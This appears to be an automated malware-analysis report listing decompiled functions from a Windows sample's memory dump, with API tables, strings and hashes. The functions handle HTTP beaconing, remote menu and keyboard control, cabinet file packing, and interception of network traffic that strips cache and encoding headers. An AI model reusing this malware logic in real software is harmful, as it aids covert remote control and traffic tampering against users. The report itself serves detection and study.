				void* __edi;
				void* __esi;
				void* _t53;
				void* _t56;
				intOrPtr _t58;
				void* _t63;
				void* _t67;
				void* _t94;
				void* _t99;
				char* _t101;
				intOrPtr* _t109;
				void* _t113;
				intOrPtr* _t114;
				signed int _t120;
				void* _t122;

				_t122 = (_t120 & 0xfffffff8) - 0x224;
				_t109 = _a4;
				if(E0040B8E3( &_v532,  *((intOrPtr*)(_t109 + 4))) == 0) {
					L25:
					return 0;
				}
				_t53 = InternetOpenA( *0x423bdc, 0, 0, 0, 0);
				_v536 = _t53;
				if(_t53 == 0) {
					L24:
					E00406E85(_v552);
					E00406E85(_v552);
					goto L25;
				}
				_t56 = InternetConnectA(_t53, _v552, _v540, 0, 0, 3, 0, 0);
				_v592 = _t56;
				if(_t56 == 0) {
					L23:
					InternetCloseHandle(_v568);
					goto L24;
				}
				_t58 =  *_t109;
				_t101 = "POST";
				if( *((char*)(_t58 + 0x18)) != 1) {
					_t101 = "GET";
				}
				_t99 = HttpOpenRequestA(_v592, _t101, _v580, "HTTP/1.1",  *(_t58 + 8), 0, (0 | _v570 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
				_v620 = _t99;
				if(_t99 == 0) {
					L22:
					InternetCloseHandle(_v624);
					goto L23;
				} else {
					E00413194(_t101,  &_v576);
					_t63 = 0xe;
					E00405ACA(_t63,  &_v600);
					_t66 =  *_a4;
					if( *((intOrPtr*)( *_a4 + 0x20)) > 0) {
						_t94 = E00407C49( &_v632,  &_v600,  *((intOrPtr*)(_t66 + 0x1c)));
						_t122 = _t122 + 0xc;
						if(_t94 > 0) {
							HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
							E00406E85(_v648);
						}
					}
					_t67 = 0xf;
					E00405ACA(_t67,  &_v596);
					_v628 = E004079D4( &_v572);
					_t113 = E00406E55(2 + _t69 * 6);
					if(_t113 == 0) {
						_t113 = 0;
					} else {
						E0040BC0E(_t113,  &_v572, _v628);
						_t99 = _v628;
					}
					if(_t113 != 0 && E00407C49( &_v632,  &_v596, _t113) > 0) {
						HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
						E00406E85(_v648);
					}
					E00406E85(_t113);
					_t114 = _a4;
					if(HttpSendRequestA(_t99, 0, 0,  *( *_t114 + 0x24),  *( *_t114 + 0x28)) != 1) {
						L21:
						InternetCloseHandle(_t99);
						goto L22;
					} else {
						_v648 = 4;
						_v652 = 0;
						if(HttpQueryInfoA(_t99, 0x20000013,  &_v652,  &_v648, 0) != 1 || _v672 != 0xc8) {
							goto L21;
						} else {
							if(E00408FBB( &_v668, _t99) != 0) {
								E00406E85(_t80);
							}
							E00406E85(_v656);
							E00406E85(_v656);
							 *((intOrPtr*)(_t114 + 8)) = _v668;
							goto L25;
						}
					}
				}
			}

0x0041bbe2
0x0041bbeb
0x0041bbfc
0x0041be09
0x0041be11
0x0041be11
0x0041bc0e
0x0041bc14
0x0041bc1a
0x0041bdf7
0x0041bdfb
0x0041be04
0x00000000
0x0041be04
0x0041bc2f
0x0041bc35
0x0041bc3b
0x0041bded
0x0041bdf1
0x00000000
0x0041bdf1
0x0041bc41
0x0041bc47
0x0041bc4c
0x0041bc4e
0x0041bc4e
0x0041bc84
0x0041bc86
0x0041bc8c
0x0041bde3
0x0041bde7
0x00000000
0x0041bc92
0x0041bc97
0x0041bca2
0x0041bca3
0x0041bcab
0x0041bcb0
0x0041bcbd
0x0041bcc2
0x0041bcc7
0x0041bcd5
0x0041bcdf
0x0041bcdf
0x0041bcc7
0x0041bcea
0x0041bceb
0x0041bcf9
0x0041bd08
0x0041bd0c
0x0041bd24
0x0041bd0e
0x0041bd19
0x0041bd1e
0x0041bd1e
0x0041bd28
0x0041bd4d
0x0041bd57
0x0041bd57
0x0041bd5d
0x0041bd62
0x0041bd79
0x0041bddc
0x0041bddd
0x00000000
0x0041bd7b
0x0041bd8c
0x0041bd94
0x0041bda1
0x00000000
0x0041bdad
0x0041bdb9
0x0041bdbc
0x0041bdbc
0x0041bdc5
0x0041bdce
0x0041bdd7
0x00000000
0x0041bdd7
0x0041bda1
0x0041bd79

APIs

Part of subcall function 0040B8E3: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0040B912

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 0041BC0E
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0041BC2F
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 0041BC7E
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0041BCD5
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0041BD4D
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 0041BD70
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 0041BD98
InternetCloseHandle.WININET(00000000), ref: 0041BDDD
InternetCloseHandle.WININET(?), ref: 0041BDE7

Part of subcall function 00408FBB: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00408FCF
Part of subcall function 00408FBB: GetLastError.KERNEL32 ref: 00408FD9
Part of subcall function 00408FBB: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00408FF9

Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98

InternetCloseHandle.WININET(?), ref: 0041BDF1

Strings

GET, xrefs: 0041BC4E, 0041BC79
POST, xrefs: 0041BC47
HTTP/1.1, xrefs: 0041BC70

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
String ID: GET$HTTP/1.1$POST
API String ID: 1023423486-2753618334
Opcode ID: 487fc3c26fcb4dfd2ebaa0128b8b281cf6090dc0e5ef58fab099692fb9f58664
Instruction ID: 134c6eefd1a62be821ea51e9f4bc80226959fb5ad9129c078edb6177a5325499
Opcode Fuzzy Hash: 487fc3c26fcb4dfd2ebaa0128b8b281cf6090dc0e5ef58fab099692fb9f58664
Instruction Fuzzy Hash: F651BE72104311AFC711AF61DC49E9FBFA9EF84354F00092AF549A21B2DB38D994CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB06, Relevance: 22.6, APIs: 15, Instructions: 132
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040DB06(unsigned int __ecx, signed int __edx, struct HWND__* _a4, signed short _a8) {
				struct tagRECT _v20;
				signed int _v24;
				int _v28;
				signed short _t40;
				int _t49;
				BYTE* _t50;
				signed short _t54;
				int _t66;
				int _t67;
				unsigned int _t68;
				signed int _t70;
				struct HMENU__* _t74;
				struct HMENU__* _t78;
				void* _t82;

				_t70 = __edx;
				_t68 = __ecx;
				_t40 = _a8;
				_t82 = _t40 - 0xfffffffd;
				if(_t82 == 0) {
					SetKeyboardState( *0x4231c8);
				} else {
					if(_t82 <= 0 || _t40 > 0xffffffff) {
						_v20.top = _t40 >> 0x10;
						_v20.right = _t68 & 0x0000ffff;
						_v20.left = _t40 & 0x0000ffff;
						_v20.bottom = _t68 >> 0x10;
						E004050A4( &_v20, _t68 >> 0x10, _t40 & 0x0000ffff, 0x4231b8, _a4, 0);
					} else {
						_t74 = GetMenu(_a4);
						if(_t74 != 0) {
							_v24 = _v24 | 0xffffffff;
							_t49 = GetMenuItemCount(_t74);
							_t66 = 0;
							_v28 = _t49;
							if(_t49 > 0) {
								do {
									if(GetMenuState(_t74, _t66, 0x400) < 0) {
										HiliteMenuItem(_a4, _t74, _t66, 0x400);
										_v24 = _t66;
									}
									_t66 = _t66 + 1;
								} while (_t66 < _v28);
							}
							_t50 =  *0x4231c8;
							_push(_t50[0x104]);
							_t67 = MenuItemFromPoint(_a4, _t74, _t50[0x100]);
							if(_t67 != 0xffffffff) {
								_v28 = GetMenuState(_t74, _t67, 0x400);
								if(_v24 != _t67) {
									EndMenu();
								}
								HiliteMenuItem(_a4, _t74, _t67, 0x480);
								if(_a8 != 0xfffffffe && (_v28 & 0x00000003) == 0) {
									if((_v28 & 0x00000010) == 0) {
										if((_v28 & 0x00000800) == 0) {
											_t54 = GetMenuItemID(_t74, _t67);
											asm("clc");
											_push( *((intOrPtr*)(_t67 + 0x6a + _t70 * 2)));
										} else {
											_t54 = 0;
											SendMessageW(_a4, 0x111, _t54 & 0x0000ffff, 0);
										}
									} else {
										_t78 = GetSubMenu(_t74, _t67);
										if(_t78 != 0 && GetMenuItemRect(_a4, _t74, _t67,  &_v20) != 0) {
											TrackPopupMenuEx(_t78, 0x4000, _v20, _v20.bottom, _a4, 0);
										}
									}
								}
							}
						}
					}
				}
				SetEvent( *0x4231c4);
				return 0;
			}

0x0040db06
0x0040db06
0x0040db0c
0x0040db15
0x0040db18
0x0040dc97
0x0040db1e
0x0040db1e
0x0040dc66
0x0040dc72
0x0040dc82
0x0040dc86
0x0040dc8a
0x0040db2d
0x0040db36
0x0040db3a
0x0040db40
0x0040db46
0x0040db4c
0x0040db4e
0x0040db59
0x0040db5b
0x0040db66
0x0040db6e
0x0040db74
0x0040db74
0x0040db78
0x0040db79
0x0040db5b
0x0040db7f
0x0040db84
0x0040db9a
0x0040db9f
0x0040dbae
0x0040dbb6
0x0040dbb8
0x0040dbb8
0x0040dbc8
0x0040dbd2
0x0040dbe8
0x0040dc37
0x0040dc3f
0x0040dc46
0x0040dc47
0x0040dc39
0x0040dc39
0x0040dc58
0x0040dc58
0x0040dbea
0x0040dbf2
0x0040dbf6
0x0040dc27
0x0040dc27
0x0040dbf6
0x0040dbe8
0x0040dbd2
0x0040db9f
0x0040db3a
0x0040db1e
0x0040dca3
0x0040dcb1

APIs

GetMenu.USER32(?), ref: 0040DB30
GetMenuItemCount.USER32 ref: 0040DB46
GetMenuState.USER32 ref: 0040DB5E
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 0040DB6E
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0040DB94
GetMenuState.USER32 ref: 0040DBA8
EndMenu.USER32 ref: 0040DBB8
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 0040DBC8
GetSubMenu.USER32 ref: 0040DBEC
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 0040DC06
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0040DC27
GetMenuItemID.USER32(00000000,00000000), ref: 0040DC3F
SendMessageW.USER32(?,00000111,?,00000000), ref: 0040DC58
SetKeyboardState.USER32 ref: 0040DC97
SetEvent.KERNEL32(?,?,00402552), ref: 0040DCA3

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
String ID:
API String ID: 751066993-0
Opcode ID: 7fb16fb35eb743de3f013154809fff89da8ef4b5d953ea6eb8393a78f26dde0c
Instruction ID: cac4b9055081532a1f2828579c1406573ab48b4e68c79266e391809770bc935f
Opcode Fuzzy Hash: 7fb16fb35eb743de3f013154809fff89da8ef4b5d953ea6eb8393a78f26dde0c
Instruction Fuzzy Hash: 7141D030408304ABE7118F64CD8CE7B7AB8EF85764F00063AF966B21F0C3748959DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB6B, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AB6B() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t7;
				void* _t9;
				intOrPtr _t16;
				intOrPtr _t18;

				if( *0x4231b4 != 0) {
					L9:
					 *0x4231b4 =  *0x4231b4 + 1;
					return 1;
				} else {
					_t2 = LoadLibraryA("cabinet.dll");
					 *0x4231b0 = _t2;
					if(_t2 == 0) {
						L8:
						return 0;
					} else {
						 *0x4227dc = GetProcAddress(_t2, "FCICreate");
						 *0x4231a0 = GetProcAddress( *0x4231b0, "FCIAddFile");
						 *0x4223d4 = GetProcAddress( *0x4231b0, "FCIFlushCabinet");
						_t7 = GetProcAddress( *0x4231b0, "FCIDestroy");
						 *0x4231a8 = _t7;
						_t16 =  *0x4227dc; // 0x0
						if(_t16 == 0 ||  *0x4231a0 == 0) {
							L7:
							FreeLibrary( *0x4231b0);
							goto L8;
						} else {
							_t18 =  *0x4223d4; // 0x0
							if(_t18 == 0 || _t7 == 0) {
								goto L7;
							} else {
								_t9 = HeapCreate(0, 0x80000, 0);
								 *0x4223d0 = _t9;
								if(_t9 != 0) {
									goto L9;
								} else {
									goto L7;
								}
							}
						}
					}
				}
			}

0x0040ab74
0x0040ac1f
0x0040ac1f
0x0040ac28
0x0040ab7a
0x0040ab7f
0x0040ab85
0x0040ab8c
0x0040ac1b
0x0040ac1e
0x0040ab92
0x0040abac
0x0040abbe
0x0040abd0
0x0040abd5
0x0040abd7
0x0040abdd
0x0040abe3
0x0040ac0f
0x0040ac15
0x00000000
0x0040abed
0x0040abed
0x0040abf3
0x00000000
0x0040abf9
0x0040ac00
0x0040ac06
0x0040ac0d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ac0d
0x0040abf3
0x0040abe3
0x0040ab8c

APIs

LoadLibraryA.KERNEL32(cabinet.dll,00000000,0040AC52,?,0040AE6E,?), ref: 0040AB7F
GetProcAddress.KERNEL32(00000000,FCICreate), ref: 0040AB9F
GetProcAddress.KERNEL32(FCIAddFile), ref: 0040ABB1
GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 0040ABC3
GetProcAddress.KERNEL32(FCIDestroy), ref: 0040ABD5
HeapCreate.KERNEL32(00000000,00080000,00000000,?,0040AE6E,?), ref: 0040AC00
FreeLibrary.KERNEL32(?,0040AE6E,?), ref: 0040AC15

Strings

FCICreate, xrefs: 0040AB99
FCIDestroy, xrefs: 0040ABC5
FCIAddFile, xrefs: 0040ABA1
FCIFlushCabinet, xrefs: 0040ABB3
cabinet.dll, xrefs: 0040AB7A

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$CreateFreeHeapLoad
String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
API String ID: 2040708800-1163896595
Opcode ID: 850c90fa2e0d931371594381f52391f9b96bf394930eef595b254d1873ee2fbb
Instruction ID: cf1ff3ff92bc6435ce4fb492c108862add0fd3f44ece2d07d5a333dd1c49fbd8
Opcode Fuzzy Hash: 850c90fa2e0d931371594381f52391f9b96bf394930eef595b254d1873ee2fbb
Instruction Fuzzy Hash: 7A110C70B48350AFDB325F25BE089263AB5F2897523A5057BE600A22B4E77D05A2CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 00415321, Relevance: 19.8, APIs: 9, Strings: 4, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00415321(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v56;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int _v84;
				signed char _v88;
				signed int _v92;
				signed int _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v128;
				void* __esi;
				signed int _t111;
				signed int _t113;
				signed char _t114;
				signed int _t115;
				void* _t117;
				signed char _t121;
				signed int _t122;
				signed int _t125;
				signed int _t128;
				signed char _t130;
				signed char _t136;
				intOrPtr _t149;
				void* _t165;
				signed char _t166;
				void* _t172;
				intOrPtr _t178;
				signed int _t184;
				void* _t186;
				void* _t188;
				signed int _t202;
				signed int _t203;

				if(E00412FEE() == 0 || _a8 == 0 || _a12 <= 0) {
					L9:
					_t111 =  *0x423964(_a4, _a8, _a12);
					goto L10;
				} else {
					EnterCriticalSection(0x423e40);
					_t192 = _a4;
					_t184 = E004143A5(_a4);
					_v84 = _t184;
					if(_t184 == 0xffffffff) {
						L8:
						LeaveCriticalSection(0x423e40);
						goto L9;
					}
					_t186 = _t184 * 0x38 +  *0x423e5c;
					if( *(_t186 + 0x20) > 0) {
						L29:
						_t113 =  *(_t186 + 0x24);
						_t188 =  *(_t186 + 0x20) - _t113;
						LeaveCriticalSection(0x423e40);
						_t195 = _a4;
						_t114 =  *0x423964(_a4,  *((intOrPtr*)(_t186 + 0x1c)) + _t113, _t188);
						_v88 = _t114;
						__eflags = _t114 - 0xffffffff;
						if(_t114 != 0xffffffff) {
							EnterCriticalSection(0x423e40);
							_t115 = E004143A5(_t195);
							__eflags = _t115 - 0xffffffff;
							if(_t115 != 0xffffffff) {
								_t166 = _v88;
								_t117 = _t115 * 0x38 +  *0x423e5c;
								__eflags = _t166 - _t188;
								if(_t166 != _t188) {
									 *((intOrPtr*)(_t117 + 0x24)) =  *((intOrPtr*)(_t117 + 0x24)) + _t166;
									_t92 = _t117 + 0x28;
									 *_t92 =  *(_t117 + 0x28) - 1;
									__eflags =  *_t92;
									_v88 = 1;
								} else {
									_t88 = _t117 + 0x1c; // -4341312
									_v88 =  *(_t117 + 0x28);
									E00406F38(E00406E85( *_t88), _t88, 0, 0x10);
								}
							} else {
								_v88 = _v88 | _t115;
								 *0x423e3c(0xffffe890, 8);
							}
							LeaveCriticalSection(0x423e40);
						}
						L36:
						_t111 = _v88;
						L10:
						return _t111;
					}
					if( *(_t186 + 8) > 0) {
						L38:
						LeaveCriticalSection(0x423e40);
						_t197 = _a4;
						_t121 =  *0x423964(_a4, _a8, _a12);
						_v88 = _t121;
						__eflags = _t121 - 0xffffffff;
						if(_t121 != 0xffffffff) {
							EnterCriticalSection(0x423e40);
							_t122 = E004143A5(_t197);
							__eflags = _t122 - 0xffffffff;
							if(_t122 != 0xffffffff) {
								_t172 = _t122 * 0x38 +  *0x423e5c;
								_t178 =  *((intOrPtr*)(_t172 + 8));
								__eflags = _v88 - _t178;
								if(_v88 > _t178) {
									E00414463(_t122);
								} else {
									 *((intOrPtr*)(_t172 + 8)) = _t178 - _v88;
								}
							} else {
								_v88 = _v88 | _t122;
								 *0x423e3c(0xffffe890, 8);
							}
							LeaveCriticalSection(0x423e40);
						}
						goto L36;
					}
					_t125 = E00414899( &_v76, _t192, _a8, _a12);
					_v92 = _t125;
					if(_t125 != 0xffffffff) {
						__eflags = _v72;
						if(_v72 == 0) {
							L37:
							E0041BB4F( &_v76);
							_t128 = _v80 + _a12;
							__eflags = _t128;
							 *(_t186 + 8) = _t128;
							goto L38;
						}
						_t130 = E0041B221( &_v76);
						_v88 = _t130;
						__eflags = _t130 & 0x00000001;
						if((_t130 & 0x00000001) == 0) {
							_v92 = 0;
							_v88 = 0;
							__eflags = _t130 & 0x00000002;
							if(__eflags != 0) {
								_t203 = E00406ED8(__eflags, _a8, _a12);
								_v100 = _t203;
								__eflags = _t203;
								if(_t203 != 0) {
									E0041BBB9( *((intOrPtr*)(_t186 + 0x10)),  *((intOrPtr*)(_t186 + 0xc)));
									E00406E85( *(_t186 + 0x14));
									E00406E85( *((intOrPtr*)(_t186 + 4)));
									_t149 = E004072E3(_v76, _v80);
									 *(_t186 + 0x14) =  *(_t186 + 0x14) & 0x00000000;
									_t38 = _t186 + 0x18;
									 *_t38 =  *(_t186 + 0x18) & 0x00000000;
									__eflags =  *_t38;
									 *((intOrPtr*)(_t186 + 4)) = _t149;
									 *((intOrPtr*)(_t186 + 0xc)) = _v36;
									 *((intOrPtr*)(_t186 + 0x10)) = _v32;
									_v128 = E0040BDAC(E0040BDAC(E0040BE28(_t203, _a12, "Accept-Encoding", "identity"), _t165, _t203, "TE"), _t165, _t203, "If-Modified-Since");
								} else {
									E0041BBB9(_v16, _v20);
								}
							}
							__eflags = _v84 & 0x00000004;
							if((_v84 & 0x00000004) == 0) {
								L27:
								__eflags = _v92;
								if(_v92 == 0) {
									goto L37;
								}
								E0041BB4F( &_v76);
								_t70 = _t186 + 0x24;
								 *_t70 =  *(_t186 + 0x24) & 0x00000000;
								__eflags =  *_t70;
								 *(_t186 + 8) = _v80;
								 *((intOrPtr*)(_t186 + 0x1c)) = _v92;
								 *(_t186 + 0x20) = _v88;
								 *(_t186 + 0x28) = _a12;
								goto L29;
							}
							_t202 = _v92;
							__eflags = _t202;
							if(__eflags != 0) {
								_t136 = _v88;
							} else {
								_t202 = _a8;
								_t136 = _a12;
							}
							_v84 = _t136;
							_v104 = E00414B79(_v84, __eflags, _t202, _v40, _v36,  &_v92);
							E00406E85(_v56);
							__eflags = _v108;
							if(_v108 != 0) {
								__eflags = _t202 - _a8;
								if(_t202 != _a8) {
									E00406E85(_t202);
								}
							} else {
								__eflags = _t202 - _a8;
								if(_t202 == _a8) {
									goto L37;
								}
								_v92 = _t202;
								_v88 = _v84;
							}
							goto L27;
						} else {
							E0041BB4F( &_v76);
							LeaveCriticalSection(0x423e40);
							_t111 =  *0x423e3c(0xffffe8a3, 0) | 0xffffffff;
							goto L10;
						}
					} else {
						E00414463(_v84);
						E0041BB4F( &_v76);
						goto L8;
					}
				}
			}

0x00415334
0x004153ac
0x004153b5
0x00000000
0x00415342
0x00415348
0x0041534e
0x00415356
0x00415358
0x0041535f
0x004153a5
0x004153a6
0x00000000
0x004153a6
0x00415364
0x0041536e
0x0041554a
0x0041554a
0x00415556
0x00415558
0x00415560
0x00415564
0x0041556d
0x00415571
0x00415574
0x00415577
0x0041557d
0x00415582
0x00415585
0x0041559c
0x004155a3
0x004155a9
0x004155ab
0x004155ca
0x004155cd
0x004155cd
0x004155cd
0x004155d0
0x004155ad
0x004155b0
0x004155b5
0x004155c3
0x004155c3
0x00415587
0x00415587
0x00415592
0x00415599
0x004155d9
0x004155d9
0x004155df
0x004155df
0x004153be
0x004153c4
0x004153c4
0x00415378
0x004155fb
0x00415602
0x00415607
0x0041560e
0x00415617
0x0041561b
0x0041561e
0x00415621
0x00415627
0x0041562c
0x0041562f
0x0041564b
0x00415651
0x00415654
0x00415658
0x00415663
0x0041565a
0x0041565e
0x0041565e
0x00415631
0x00415631
0x0041563c
0x00415643
0x00415669
0x00415669
0x00000000
0x0041561e
0x00415389
0x0041538e
0x00415395
0x004153c7
0x004153cb
0x004155e8
0x004155ec
0x004155f5
0x004155f5
0x004155f8
0x00000000
0x004155f8
0x004153d6
0x004153db
0x004153df
0x004153e1
0x00415407
0x0041540b
0x0041540f
0x00415411
0x00415422
0x00415424
0x00415428
0x0041542a
0x00415441
0x00415449
0x00415451
0x0041545e
0x00415463
0x00415467
0x00415467
0x00415467
0x00415470
0x0041547f
0x00415487
0x004154a7
0x0041542c
0x00415434
0x00415434
0x0041542a
0x004154ab
0x004154b0
0x00415517
0x00415517
0x0041551c
0x00000000
0x00000000
0x00415526
0x0041552f
0x0041552f
0x0041552f
0x00415533
0x0041553a
0x00415541
0x00415547
0x00000000
0x00415547
0x004154b2
0x004154b6
0x004154b8
0x004154c2
0x004154ba
0x004154ba
0x004154bd
0x004154bd
0x004154c6
0x004154e5
0x004154e9
0x004154ee
0x004154f3
0x0041550c
0x0041550f
0x00415512
0x00415512
0x004154f5
0x004154f5
0x004154f8
0x00000000
0x00000000
0x00415502
0x00415506
0x00415506
0x00000000
0x004153e3
0x004153e7
0x004153ed
0x00415402
0x00000000
0x00415402
0x00415397
0x0041539b
0x004153a0
0x00000000
0x004153a0
0x00415395

APIs

Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6

EnterCriticalSection.KERNEL32(00423E40), ref: 00415348
LeaveCriticalSection.KERNEL32(00423E40), ref: 004153A6
LeaveCriticalSection.KERNEL32(00423E40,?), ref: 004153ED
LeaveCriticalSection.KERNEL32(00423E40), ref: 00415558
EnterCriticalSection.KERNEL32(00423E40), ref: 00415577
LeaveCriticalSection.KERNEL32(00423E40), ref: 004155D9
LeaveCriticalSection.KERNEL32(00423E40), ref: 00415602
EnterCriticalSection.KERNEL32(00423E40), ref: 00415621
LeaveCriticalSection.KERNEL32(00423E40), ref: 00415669

Strings

Accept-Encoding, xrefs: 00415477
identity, xrefs: 0041546B
@>B, xrefs: 00415342
If-Modified-Since, xrefs: 0041549B

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$Enter$ObjectSingleWait
String ID: @>B$Accept-Encoding$If-Modified-Since$identity
API String ID: 3286975823-3296971209
Opcode ID: 6797f89c01954efec44322b81482b2b8e90204253cdd242a44d6d0dba830163a
Instruction ID: 11c4516be5d184a6d5bd5eb187cff624ea92d841620890c5f564985e6b30c199
Opcode Fuzzy Hash: 6797f89c01954efec44322b81482b2b8e90204253cdd242a44d6d0dba830163a
Instruction Fuzzy Hash: C2A17D71504701EFC710EF24C845A9EBBA1FF88315F104A2EF859A32A1C778E995CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D83A, Relevance: 18.1, APIs: 12, Instructions: 78
filesynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D83A(void** __eax, char _a4) {
				void* __esi;
				void* _t15;
				void* _t16;
				long _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				struct HDC__* _t23;
				void* _t24;
				void* _t25;
				void** _t41;

				_t41 = __eax;
				_t15 =  *(__eax + 0x1c);
				if(_t15 != 0) {
					DeleteObject(_t15);
				}
				_t16 = _t41[3];
				if(_t16 != 0) {
					CloseHandle(_t16);
				}
				_t17 = _t41[1];
				if(_t17 != 0xffffffff) {
					TlsFree(_t17);
				}
				_t18 = _t41[5];
				if(_t18 != 0) {
					CloseHandle(_t18);
				}
				_t19 = _t41[4];
				if(_t19 != 0) {
					UnmapViewOfFile(_t19);
				}
				_t20 =  *_t41;
				if(_t20 != 0) {
					_t20 = CloseHandle(_t20);
				}
				if(_a4 != 0) {
					_t21 = _t41[0x56];
					if(_t21 != 0) {
						SelectObject(_t41[0x55], _t21);
					}
					_t22 = _t41[0x57];
					if(_t22 != 0) {
						DeleteObject(_t22);
					}
					_t23 = _t41[0x55];
					if(_t23 != 0) {
						DeleteDC(_t23);
					}
					_t24 = _t41[0x58];
					if(_t24 != 0) {
						CloseHandle(_t24);
					}
					_t25 = _t41[0x60];
					if(_t25 != 0 && WaitForSingleObject(_t25, 0) != 0x102) {
						PostThreadMessageW(_t41[0x62], 0x12, 0, 0);
					}
					_t20 = E00408894( &(_t41[0x5f]));
				}
				return _t20;
			}

0x0040d842
0x0040d844
0x0040d84a
0x0040d84d
0x0040d84d
0x0040d84f
0x0040d85a
0x0040d85d
0x0040d85d
0x0040d85f
0x0040d865
0x0040d868
0x0040d868
0x0040d86e
0x0040d873
0x0040d876
0x0040d876
0x0040d878
0x0040d87d
0x0040d880
0x0040d880
0x0040d886
0x0040d88a
0x0040d88d
0x0040d88d
0x0040d894
0x0040d896
0x0040d89e
0x0040d8a7
0x0040d8a7
0x0040d8ad
0x0040d8b5
0x0040d8b8
0x0040d8b8
0x0040d8ba
0x0040d8c2
0x0040d8c5
0x0040d8c5
0x0040d8cb
0x0040d8d3
0x0040d8d6
0x0040d8d6
0x0040d8d8
0x0040d8e0
0x0040d8fe
0x0040d8fe
0x0040d90a
0x0040d90a
0x0040d912

APIs

DeleteObject.GDI32(?), ref: 0040D84D
CloseHandle.KERNEL32(?,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D85D
TlsFree.KERNEL32(?,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D868
CloseHandle.KERNEL32(?,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D876
UnmapViewOfFile.KERNEL32(?,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D880
CloseHandle.KERNEL32(?,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D88D
SelectObject.GDI32(?,?), ref: 0040D8A7
DeleteObject.GDI32(?), ref: 0040D8B8
DeleteDC.GDI32(?), ref: 0040D8C5
CloseHandle.KERNEL32(?,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D8D6
WaitForSingleObject.KERNEL32(?,00000000,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D8E5
PostThreadMessageW.USER32 ref: 0040D8FE

Memory Dump Source

